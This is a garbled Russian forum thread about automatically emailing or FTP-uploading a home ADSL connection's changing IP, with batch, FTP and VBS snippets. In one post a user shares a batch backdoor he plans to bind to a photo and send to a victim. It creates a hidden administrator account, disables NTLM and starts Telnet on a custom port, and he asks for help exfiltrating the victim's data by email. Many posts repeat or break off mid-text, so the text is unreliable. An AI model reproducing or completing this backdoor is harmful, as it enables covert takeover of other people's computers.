Отправка по почте IP-адреса подключения ADSL
-
Greyman
Re: Отправка по почте IP-адреса подключения ADSL
Georgiy
Цитата:
Автору темы, пожалуй, больше подходит вариант, который предложил я. Ведь команда tracert, если я не ошибаюсь, не дает IP-адрес клиента:
Твой вариант - тока частный случай, когда локальный адрес компа присваивается автоматически самим модемом. Мой вариант тоже не универсален, т. к. как раз такой случай он и не учитывает, а подходит для случая с использованием маршрутизатора (все равно какого, аппаратного или из компа). Соответственно для разного случая подключения можно использовать ту или иную команду, либо сделать вообще универсальый набор инфы, объединив результаты обоих этих команд.
Цитата:
Автору темы, пожалуй, больше подходит вариант, который предложил я. Ведь команда tracert, если я не ошибаюсь, не дает IP-адрес клиента:
Твой вариант - тока частный случай, когда локальный адрес компа присваивается автоматически самим модемом. Мой вариант тоже не универсален, т. к. как раз такой случай он и не учитывает, а подходит для случая с использованием маршрутизатора (все равно какого, аппаратного или из компа). Соответственно для разного случая подключения можно использовать ту или иную команду, либо сделать вообще универсальый набор инфы, объединив результаты обоих этих команд.
-
dimich22
Для заливки файла на некоторый ftp-сервер можно в командный файл вставить следующую строку:
ftp -i -s:C:\auto\ftp.txt
-i убирает вывод запросов;
-s указывает текстовый файл с ftp-командами. Эти команды выполняются автоматически после запуска команды ftp. Значение данного параметра не должно содержать пробелов. Данный параметр следует использовать вместо перенаправления (> myip.txt
blat261\full\blat.exe C:\auto\myip.txt -to mywork@mail.ru -subject "My home IP" -charset windows-1251
del myip.txt
[/b]
2) Скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым:
@rasdial ADSL ptn ptn
cscript showmyip.vbs >> myip.txt
del myip.txt
Содержимое файла ftp.txt приведено выше. Удаление производится из-за того, что скрипт определения IP дописывает информацию, а не перезаписывает. Можно и не удалять или подправить скрипт.
Для Gozya же подходит второй вариант.
>> но какбы сделать чтобы при изменении IP
как часто меняется IP? Может быть можно использовать планировщик Windows, который и будет вызывать командный файл send.cmd?
-s указывает текстовый файл с ftp-командами. Эти команды выполняются автоматически после запуска команды ftp. Значение данного параметра не должно содержать пробелов. Данный параметр следует использовать вместо перенаправления (> myip.txt
blat261\full\blat.exe C:\auto\myip.txt -to mywork@mail.ru -subject "My home IP" -charset windows-1251
del myip.txt
[/b]
2) Скопировать все в ту же папку C:\auto скрипт dimich22 и создать один командный файл C:\auto\send.cmd со следующим содержимым:
@rasdial ADSL ptn ptn
del myip.txt
Содержимое файла ftp.txt приведено выше. Удаление производится из-за того, что скрипт определения IP дописывает информацию, а не перезаписывает. Можно и не удалять или подправить скрипт.
как часто меняется IP? Может быть можно использовать планировщик Windows, который и будет вызывать командный файл send.cmd?
-
Gozya
Для заливки файла на некоторый ftp-сервер можно в командный файл вставить следующую строку:
del myip.txt
[/b]
@rasdial ADSL ptn ptn
del myip.txt
del myip.txt
[/b]
@rasdial ADSL ptn ptn
del myip.txt
-
Negativ
Qwe1
Gozya
Уважаемые вы совсем забыли о безопасности. Если Radmin будет слушаться на внешнем интерфейсе вашего компьютера, то попасть на ваш компьютер не составит большого труда. Я бы посоветовал VPN для Radmin'о подобных программ.
Gozya
Уважаемые вы совсем забыли о безопасности. Если Radmin будет слушаться на внешнем интерфейсе вашего компьютера, то попасть на ваш компьютер не составит большого труда. Я бы посоветовал VPN для Radmin'о подобных программ.
-
Negativ
>>как часто меняется IP?
на самом деле IP должен меняться тока при начале новой сессии соединения, но иногда провайдер сам его сбрасует вынудив модем переконектится.
О радмине или VPN речь идти не может, они требовательны к трафику, а я на работе имею слабый канал, та и ненужны мне их функции. Это конечно касается меня, не Qwe1.
Всем спасибо за ответы, скоро разгребусь с делами и буду пробовать.
на самом деле IP должен меняться тока при начале новой сессии соединения, но иногда провайдер сам его сбрасует вынудив модем переконектится.
О радмине или VPN речь идти не может, они требовательны к трафику, а я на работе имею слабый канал, та и ненужны мне их функции. Это конечно касается меня, не Qwe1.
Всем спасибо за ответы, скоро разгребусь с делами и буду пробовать.
-
Vyacheslav.Sedoy
вундыркинды что в компьютерах шарят_____есть такие на форуме
-
Vyacheslav.Sedoy
ТЕМА ХОРОШАЯ НО Я ВОПРОС НЕ МНОГО ПО ДРУГОМУ ПОСТАВЛЮ ЗНАЧИТ ТАК :
ЕСТЬ Пакетный файл MS-DOS КОТОРЫЙ Я СОБИРАЮСЬ СКЛЕЕТЬ С ФОТОГРАФИЕЙ
И НАМЕРЕН ЗАКИНУТЬ НУЖНОМУ ЧЕЛУ____
НАШЕЛ СКРИПТ НА ОТКРЫТИЕ ПОРТА telnet С ПРОВАМИ АДМИНА
chcp 1251
net user SUPPORT_388945a0 /delete
net user support hacker /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "support" /t reg_dword /d 0 y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
ЗНАЧИТ ПОТОМ ВЫТЯГИВАЮ НУЖНУЮ ИНФОРМАЦИЮ ИЗ КОМПЬЮТЕРА ФАЙЛ ЛОЖИТЬСЯ
C:\ip.txt
ПРИ ПОМОЩИ КОМАНДЫ
cmd.exe /c ipconfig > C:\ip.txt
И ТЕПЕРЬ МНЕ БЫ СКРИПТ ЧТО БЫ ЭТОТ ФАЙЛ НАХОДЯЩИЙСЯ В C:\ip.txt
ЧЕРЕЗ Telnet ПЕРЕКИНУТЬ К СЕБЕ НА ПОЧТУ mail.ru
вот хотел бы спросить у ведующих людей РАЗБИРАЮЩИХ В ЭТОМ ДЕЛЕ
ПОМОЧЬ ЦЕЛИКОМ ______ПРОПИСАТЬ СКРИПТ ОТ А ДО Я
ДЕЛО В ТОМ ЧТО Я В ЭТОМ ДЕЛЕ МАЛО ЧТО СЕКУ________
ПАРНИ ПОМОЖЕТЕ ?
ЕСТЬ Пакетный файл MS-DOS КОТОРЫЙ Я СОБИРАЮСЬ СКЛЕЕТЬ С ФОТОГРАФИЕЙ
И НАМЕРЕН ЗАКИНУТЬ НУЖНОМУ ЧЕЛУ____
НАШЕЛ СКРИПТ НА ОТКРЫТИЕ ПОРТА telnet С ПРОВАМИ АДМИНА
chcp 1251
net user SUPPORT_388945a0 /delete
net user support hacker /add
net localgroup Администраторы support /add
net localgroup Пользователи SUPPORT_388945a0 /del
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "support" /t reg_dword /d 0 y
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet
ЗНАЧИТ ПОТОМ ВЫТЯГИВАЮ НУЖНУЮ ИНФОРМАЦИЮ ИЗ КОМПЬЮТЕРА ФАЙЛ ЛОЖИТЬСЯ
C:\ip.txt
ПРИ ПОМОЩИ КОМАНДЫ
cmd.exe /c ipconfig > C:\ip.txt
И ТЕПЕРЬ МНЕ БЫ СКРИПТ ЧТО БЫ ЭТОТ ФАЙЛ НАХОДЯЩИЙСЯ В C:\ip.txt
ЧЕРЕЗ Telnet ПЕРЕКИНУТЬ К СЕБЕ НА ПОЧТУ mail.ru
вот хотел бы спросить у ведующих людей РАЗБИРАЮЩИХ В ЭТОМ ДЕЛЕ
ПОМОЧЬ ЦЕЛИКОМ ______ПРОПИСАТЬ СКРИПТ ОТ А ДО Я
ДЕЛО В ТОМ ЧТО Я В ЭТОМ ДЕЛЕ МАЛО ЧТО СЕКУ________
ПАРНИ ПОМОЖЕТЕ ?
-
Sayan
дайте ктото ссилку на ети скрипты пожалуйста-очень надо!
-
Sayan
Основная масса современных ADSL, настривается в качестве router и имеет функционал DynDNS.
Если у Вас модем работает в режиме моста, то клиент DynDNS можно установить на ОС.
Таким образом Вы получите доменное имя третьего уровня, которое будет всегда разрешаться в действительный IP-адрес подключения.
PS: VPN для RAdmin можно и не делать, если есть возможность ограничить подключения (межсетевым экраном) с учетом адресов подключений - на работе у Вас скорее ввсего будет использовать выход в Инет со статического адреса.
Если у Вас модем работает в режиме моста, то клиент DynDNS можно установить на ОС.
Таким образом Вы получите доменное имя третьего уровня, которое будет всегда разрешаться в действительный IP-адрес подключения.
PS: VPN для RAdmin можно и не делать, если есть возможность ограничить подключения (межсетевым экраном) с учетом адресов подключений - на работе у Вас скорее ввсего будет использовать выход в Инет со статического адреса.
-
StarFox
Цитата dimich22:
Узнать свой внешний ip можно через скрипт
Запускаем его т.о. cscript showmyip.vbs >> myip.txt и отправляем этот файлик, как это предлагалось выше
можно ли перезалить скрипт ?
Узнать свой внешний ip можно через скрипт
Запускаем его т.о. cscript showmyip.vbs >> myip.txt и отправляем этот файлик, как это предлагалось выше
Отправка по почте IP-адреса подключения ADSL
можно ли перезалить скрипт ?